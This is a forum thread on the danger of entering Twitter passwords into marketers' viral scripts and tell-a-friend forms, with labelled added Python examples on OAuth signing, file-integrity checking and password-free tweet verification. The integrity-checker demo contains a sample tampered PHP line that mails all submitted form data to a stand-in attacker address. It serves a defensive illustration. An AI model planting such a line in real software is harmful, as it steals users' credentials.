Your Twitter Account Has Been Hacked... And *You* Are To Blame?

by Paul Hancox 20 replies
Hi Folks

OK, this has been on my mind for a while now. What I'm about to say isn't
going to be popular with some people - but I've got to say it, anyway!

Andy Beard recently posted on his blog about the spate of new tools and
"viral" scripts that require your Twitter (or Gmail) password in order to
use them.

He is seriously concerned about the security risks - and quite frankly, so
am I.

Now, please understand... my problem IS NOT so much with the scripts
themselves. Most of them claim NOT to store the password provided by
the visitor, and I have no doubt those claims are true.

Here are my problems with them... Let me paint you a picture:

Jo is a scammer. He sets up a perfectly legitimate looking site, offering
internet marketers a load of bonus products for free, in exchange for their
Twitter username and password.

He provides a form, using a recognizable viral Twitter tool, and you type
in your details, because you trust the tool.

Unfortunately for you, Jo is NOT really using the actual tool, but simply a
form which LOOKS LIKE IT.

You have just given Jo the scammer your Twitter password. Oops. 10 days
later (when you've likely forgotten which site(s) you've used to collect all
kinds of cool bonuses)... your Twitter account is suddenly hijacked.

You don't know why. But Jo does.

You gave him the keys.

That is my problem.

If Jo hacks into your account, aren't you at least partly to blame because
you gave him your password?

As people become more accustomed to doing this (i.e. giving out their
Twitter password), surely they're increasing the chances they will bump
into an unscrupulous person like Jo on the Internet.

Of course, that means you should only give it out to sites that you trust.

The problem there is, many people don't follow this - they give it out to all
kinds of sites because they want the bonus or convenience being offered.

That is why, personally speaking, I will almost never give my Twitter
password out to ANY site. If I HAVE TO, I will temporarily change my
password first, and change it back again when I've finished.

In fact, I am in the middle of writing a viral tool for Twitter that does NOT
require anybody's password - partly because I'm a capitalistic Warrior, but
partly because I'm getting pretty worried by the growing trend for scripts
and forms that ask for passwords...

... quite frankly, it's got to stop! (In my humble opinion, of course.)

So how do you feel about this issue?

As I said at the outset, I don't think this is going to be a popular
viewpoint, because an increasing number of marketers are using such
scripts and plug-ins.

I have no doubt the people using them are honest. BUT... could this
increasing number of people be conditioning the market to do something
they shouldn't be doing, i.e. giving out passwords to their accounts?
  • bizarizona
    It seems many of those sites are finally getting on the Oauth bandwagon. Most of them haven't been because Twitter was dragging their heels.

    I don't know much about Twitter marketing tools, but I do use a few Twitter tools to manage my Twitter horde. Just in the past week I've seen almost every other Twit tool out there finally adding the secure login.

    I think it's good practice to change your password very regularly anyway.
    • AndyBeard
      You know you can always trust warriors, so we are going to do a little experiment

      Please post below your real:-

      Gmail username & password

      Twitter username password below


      Ok send them to me in a PM, you know you can trust me with the keys to your business

      All those domain registrations
      Hosting accounts

      Still no?

      So why would you trust anyone running an invite script on a poorly secured shared server, running GPL scripts which have security holes patched every week?
      I think Paul's scenario is actually less likely, because there is that trust barrier. Much better to find someone who is trusted and hack their server.

      Maybe they are even using the script as part of their affiliate promotions - you can get paid to send traffic to a hacked script, and collect all the details for your own devious plans.

      Security holes?

      As an example, I could look for anyone running old Wordpress versions, especially if they are using WordPress as a membership site, or maybe some of the scripts sold in the WSO section that have been knocked together by freelancers or are not much better than alpha.

      Just at random I checked one site, saw it was WP 2.61

      Googled Zero day Wordpress 2.61

      Lots of security warnings advising upgrades to 2.62

      The fun part is if someone hacks one script, they can potentially gain access to not just the hosting account, but the whole server.

      The most dangerous part which Paul highlighted brilliantly is the psychological effect - you become accustomed to handing these things out, as if it is the same as an email address.

      People have made fortunes selling you viral tell-a-friend scripts which are a liability, and there have been solutions to make them safe for 9 months.
  • Paul Hancox
    Great reminder about changing passwords. As for secure login, isn't it interesting... most people would *insist* on Gmail or Twitter themselves having a secure login facility, yet they may happily give their password out through an INSECURE form on somebody's site! :O
  • Tyrus Antas
    There is no real reason to require passwords. All developers can use the OAuth api in which users are required to give manual permission for a website to access their account while not needing to give away their password:
    Twitter API Wiki / OAuth FAQ

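To make the OAuth point concrete, here is an added example (not code from the thread, and not Twitter's own) of how an OAuth 1.0a client, the scheme Twitter's API used for this "secure login", signs a request. The site only ever holds a consumer key/secret identifying the app and an access token/secret that Twitter issues after the user clicks Allow on twitter.com; the user's password never reaches the site. All keys, tokens, the status text and the example URL are assumed sample values.

```python
# Added example, not code from the thread or from Twitter: how an OAuth 1.0a
# client (the kind of "secure login" the thread refers to) signs a request
# with HMAC-SHA1.  Sample keys, tokens and the request are made-up values.
import base64
import hashlib
import hmac
import secrets
import time
from urllib.parse import quote


def pct(value):
    """RFC 5849 percent-encoding: only A-Z a-z 0-9 - . _ ~ are left bare."""
    return quote(str(value), safe="-._~")


def signature_base_string(method, base_url, params):
    """params: list of (name, value) pairs covering the query string, the form
    body and every oauth_* protocol parameter except oauth_signature.  Pairs are
    encoded, sorted by name then value, and joined with & and =."""
    encoded = sorted((pct(k), pct(v)) for k, v in params)
    normalized = "&".join(f"{k}={v}" for k, v in encoded)
    return "&".join([method.upper(), pct(base_url), pct(normalized)])


def sign(base_string, consumer_secret, token_secret):
    """HMAC-SHA1 over the base string, keyed with the two secrets.  The user's
    password is never an input: the token secret is what Twitter handed the
    app after the user clicked Allow, and the user can revoke it later."""
    key = f"{pct(consumer_secret)}&{pct(token_secret)}".encode()
    digest = hmac.new(key, base_string.encode(), hashlib.sha1).digest()
    return base64.b64encode(digest).decode()


def authorization_header(method, base_url, params, consumer_key,
                         consumer_secret, token, token_secret,
                         nonce=None, timestamp=None):
    """Build the Authorization: OAuth ... header for one request."""
    oauth = {
        "oauth_consumer_key": consumer_key,
        "oauth_nonce": nonce or secrets.token_hex(16),
        "oauth_signature_method": "HMAC-SHA1",
        "oauth_timestamp": str(timestamp or int(time.time())),
        "oauth_token": token,
        "oauth_version": "1.0",
    }
    base = signature_base_string(method, base_url,
                                 list(params) + list(oauth.items()))
    oauth["oauth_signature"] = sign(base, consumer_secret, token_secret)
    header = ", ".join(f'{pct(k)}="{pct(v)}"' for k, v in sorted(oauth.items()))
    return "OAuth " + header


if __name__ == "__main__":
    # Assumed sample values; a real app gets these from Twitter's developer
    # page and from the token exchange that follows the user's Allow click.
    print(authorization_header(
        "POST", "https://api.twitter.com/1.1/statuses/update.json",
        [("status", "Just tried the new tool")],
        consumer_key="example-consumer-key",
        consumer_secret="example-consumer-secret",
        token="example-access-token",
        token_secret="example-token-secret"))
```

The practical difference for the user: the access token is tied to one app and can be revoked from the Twitter settings page without changing the password, and a site that gets compromised leaks a token that only works against Twitter's API under that app's identity, not a password that can be tried against Gmail, hosting accounts and everything else.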
  • Darrel Hawes
    People need to be vigilant about phishing schemes.

    One helpful tool I've used is McAfee Site Advisor.
    • ladyshadowrider
      Here's a true story that happened to me recently.

      Someone I trust posted on a private forum asking for people to test out a retweet plugin he'd just installed on his blog. Since he was someone I've known online for several years, I went to his blog and tried it out by entering my login info into the form to retweet his blog post.

      Within a couple of days I started getting 5, 10, 15 new followers, which I thought was pretty cool, at first.

      When I went into my twitter account, I discovered that several of my most recent tweets were gone and that every new follower (most of which were twitter spam) had somehow gotten my account to automatically follow them!

      I immediately changed my password and began clearing out the spam. Haven't had any problems since, so can only "assume" the retweet plugin was the culprit.

      It could have been worse and I'm sure the guy whose blog I retweeted had no idea that this would happen.

      So, not only should we be careful about where we enter our login info, but we need to be careful about the twitter tools we use on our sites.

  • AndyBeard
    Darrel, McAfee isn't going to help you if the site is owned by one of your clients who you trust

    The site is exactly who they claim to be, they are not installing anything on your system, just asking for your details in exchange for a bonus.

    But unknown even to the site owner, someone might have hacked their way into WordPress, maybe through an insecure plugin.

    That in itself isn't a major problem, there are daily backups, if it happens it is forgivable, even if the hacker gained access to email addresses.

    The hacker might also get hold of one Twitter account, because most Twitter plugins store passwords in the MySQL database.

    But why raid the pantry when there is a huge stack of gold in the next room, a simple form, asking someone to tell their friends about the site in exchange for an exclusive additional bonus.

    The hacker just modifies 2 lines of code, and instead of functioning just as a TAF script, it also stores all the data somewhere, or immediately sends it to another server and database, or sends it by email to an anonymous email address.
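The "two modified lines" scenario is exactly what a file-integrity check on the script's directory is for. Below is an added example (my own, not code from the thread or from any WordPress plugin) that hashes every file under a plugin directory, stores the result as a baseline, and later reports which files changed or appeared. The tell-a-friend files it writes are constructed stand-ins, and the attacker's "collector" address is made up.

```python
# Added example, not code from the thread or from any WordPress plugin: a small
# file-integrity check that would flag the "two modified lines" and any dropped
# file in a tell-a-friend script's directory.  The plugin files written here
# are constructed stand-ins, not a real plugin.
import hashlib
import os
import shutil
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each file under root (relative path) to its SHA-256."""
    manifest = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def compare(baseline, current):
    """Diff two manifests; any non-empty list means the tree changed."""
    return {
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Baseline a toy plugin directory, tamper with it, and report the diff."""
    root = tempfile.mkdtemp(prefix="taf-plugin-")
    try:
        original = {
            "taf.php": "<?php mail($friend, $subject, $body); ?>\n",
            "includes/form.php": "<?php echo '<form method=\"post\">...</form>'; ?>\n",
        }
        for rel, content in original.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as f:
                f.write(content)
        baseline = build_manifest(root)   # in practice: keep this copy OFF the server

        # The attack Andy describes: the script still works for the visitor, but
        # a copy of every submission now goes elsewhere, and one file has appeared.
        with open(os.path.join(root, "taf.php"), "w") as f:
            f.write("<?php mail('collector@attacker.invalid', 'taf', print_r($_POST, true));\n"
                    "mail($friend, $subject, $body); ?>\n")
        with open(os.path.join(root, "includes/.cache.php"), "w") as f:
            f.write("<?php /* dropped by the intruder */ ?>\n")

        return compare(baseline, build_manifest(root))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())   # {'modified': ['taf.php'], 'added': ['includes/.cache.php'], 'removed': []}
```

The baseline has to live somewhere the web server's user cannot write (a local copy, or a cron job on another box that pulls the tree over SFTP), otherwise whoever edits taf.php also edits the manifest. Run it after every legitimate update and alert on any non-empty list.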
  • Steven Fullman
    Originally Posted by Paul Hancox:

        If Jo hacks into your account, aren't you at least partly to blame because
        you gave him your password?
    Partly to blame?

    What are you, Paul...some kind of...ohhh...this stuff makes me come out in goddamned HIVES...Blame?

    I'm not partly to blame for any of it.

    AT ALL.


    I'm completely at fault for giving away my details to an untrusted source.

    It's MY fault.

    And YOURS if you do the same.

    Nice post, you brummie *******


    That reminds me (or have you induced me...), I must catch up on Video #3...

    ...And talking of hypnosis...have you seen the Awareness Test?



  • Mary Green
    I agree with your comments about twitter tools. I get uncomfortable having to put in my password as well. I am looking forward to the twitter tool you are making, you should start a list of people to send it to.

  • stevenh512
    Of course, if you give out any of your passwords and your account gets "hacked" (I consider that more a "social engineering" exploit than an actual hack, but let's not argue semantics here lol), it's your own fault. We've all been told by every website we've ever signed up for since we got online (banks, email accounts, forums, membership sites) to keep our passwords safe.

    That being said, I think at least part of the blame here has to be put on Twitter for releasing an API that required username and password for authentication. They have OAuth now, but it's too late, the damage has been done. All these dozens of scripts are already out there "in the wild" asking for people's Twitter username and password. Even if the authors of these scripts upgrade them to use OAuth, that doesn't guarantee that the sites who already have the scripts up and running are going to upgrade them, so no matter what you'll still have sites "training" people to freely give out their Twitter password in exchange for some cheap ebooks or a promise of "thousands of followers in a month" or whatever the case may be. At this point the only way to solve the problem (since people will continue entering their password as long as these sites exist) is for Twitter to completely eliminate username/password authentication in their API and require all apps to use OAuth.


  • Carl Pruitt
    Given the ingenuity hackers have always possessed, our online security is tenuous enough without leaving the doors unlocked.

    I've been almost as concerned with the glut of different FB apps and other services wanting my email password to bring in my contacts. I choose not to participate in that, but quite a lot of information is revealed to FB apps when your friends allow them access. Information which could help enable hackers to guess passwords. (Hint: don't use any combination of the elements of your birthdate in any passwords.)

    • Eric Lorence
      Maybe 20% of the ones reading this thread, and newbie webmasters in general, have any understanding of web security... GPL? SQL? wad dat?

      I fully agree with Andy, some of the most "trusted" sites pose the most risk... Gmail??

      You almost need to have a "throw away" identity to use online anymore.

      And maybe that site owner did have every intention of stealing your Twitter account (hypothetically), how well can you ever know them?
  • AndyBeard
    Steven, Twitter certainly can be blamed in part, but remember that many of these applications just want your password to send a tweet, not check who you follow, add follows etc.
    Verification that you sent a tweet can be achieved just by monitoring your timeline or a #hashtag, and you can be required to follow an account to receive a DM.

    With Tell A Friend scripts, the APIs for Google, Yahoo and MSN have been around for 9 months or so. It has taken some large sites a long time to implement them, but there are also services that provide ready made drop in code.

    Plus there is no real need to use APIs anyway, all major services support mailto: with encoded email title and body contents, and you can provide a unique tracking link for each person, passing through a separate domain.
    Then the user is really using their own email system to send the email to their friends.
    • stevenh512
      Originally Posted by AndyBeard:

          Steven, Twitter certainly can be blamed in part, but remember that many of these applications just want your password to send a tweet, not check who you follow, add follows etc.
          Verification that you sent a tweet can be achieved just by monitoring your timeline or a #hashtag, and you can be required to follow an account to receive a DM.
      There's no need to get someone's Twitter password just to send a tweet, but you're right, a lot of the "viral" scripts do ask for a password just to do something that could just as easily be done with a standard HTML link.

      If I want to verify (through the API) that someone actually sent a tweet from my website, for example to give them a "gift" for tweeting something, I can do that by putting @myname somewhere in the tweet and having my script log into the API through my own Twitter account to check my @replies. I wouldn't need the end-user's Twitter password at all, just their user name.

      Twitter has to take some of the blame for the problem here because of the way they designed their API.. but the same can be said for the authors of some of these viral scripts that use the API in ways that aren't really necessary to accomplish whatever the script needs to do. But ultimately, like I said before, if you give out your password to anyone and your account gets hacked it's your own fault, you should know better.

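As an added example of the password-free verification stevenh512 and Andy describe (my own code, not the thread's and not a Twitter library), here is the check a site would run over its own mentions: the visitor gives a screen name, the site reads its own @replies through its own account, and the gift is released only if that user posted the required text. The one refinement is a per-visitor token in the required text, because without it anyone could type in "alice" and collect on a tweet alice sent for herself. SITE_HANDLE, the tokens and the mentions list are constructed sample data, not a real account or API response.

```python
# Added example, not code from the thread: checking that a visitor really
# tweeted about the site using only the owner's own mentions and the visitor's
# screen name, as stevenh512 describes, with a per-visitor token so that one
# person cannot collect the gift on the strength of someone else's tweet.
# SITE_HANDLE and the mentions list are constructed sample data, not a real
# Twitter account or API response.
import re
import secrets
from datetime import datetime, timedelta, timezone

SITE_HANDLE = "mysite"   # assumed: the owner's own account, whose mentions we read


def issue_challenge():
    """Token shown to one visitor; their tweet must contain it."""
    return secrets.token_urlsafe(6)


def required_text(token):
    return f"@{SITE_HANDLE} {token}"


def find_valid_tweet(mentions, screen_name, token, now, max_age=timedelta(hours=24)):
    """Return the first mention that (a) was authored by screen_name, (b) is not
    a retweet of someone else's tweet, (c) is recent, and (d) contains the token
    as a whole word.  None means the visitor has not earned the gift."""
    wanted = screen_name.lstrip("@").lower()
    pattern = re.compile(r"(?<!\w)" + re.escape(token) + r"(?!\w)")
    for m in mentions:
        if m["screen_name"].lower() != wanted:
            continue
        if m.get("retweeted_from"):
            continue
        if now - m["created_at"] > max_age:
            continue
        if pattern.search(m["text"]):
            return m
    return None


NOW = datetime(2009, 4, 20, 12, 0, tzinfo=timezone.utc)
ALICE_TOKEN = "Zq7pK3"     # what the site issued to alice
BOB_TOKEN = "xY9mLn"       # what the site issued to bob

# Constructed sample in the shape of a mentions timeline (newest last)
SAMPLE_MENTIONS = [
    {"screen_name": "alice", "text": "Loved the free report from @mysite Zq7pK3",
     "created_at": NOW - timedelta(minutes=5), "retweeted_from": None},
    {"screen_name": "bob", "text": "RT @alice: Loved the free report from @mysite Zq7pK3",
     "created_at": NOW - timedelta(minutes=3), "retweeted_from": "alice"},
    {"screen_name": "alice", "text": "@mysite nice tool",
     "created_at": NOW - timedelta(minutes=1), "retweeted_from": None},
    {"screen_name": "carol", "text": "@mysite cR4tokenold",
     "created_at": NOW - timedelta(days=3), "retweeted_from": None},
]


if __name__ == "__main__":
    print(find_valid_tweet(SAMPLE_MENTIONS, "@Alice", ALICE_TOKEN, NOW))   # alice's tweet
    print(find_valid_tweet(SAMPLE_MENTIONS, "alice", BOB_TOKEN, NOW))      # None
```

The only credential involved is the site owner's own, used server-side to read the owner's mentions; the visitor hands over nothing but a screen name. The token also closes the loophole Andy's #hashtag approach leaves open, since a hashtag is public and any tweet carrying it could be claimed by anyone.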
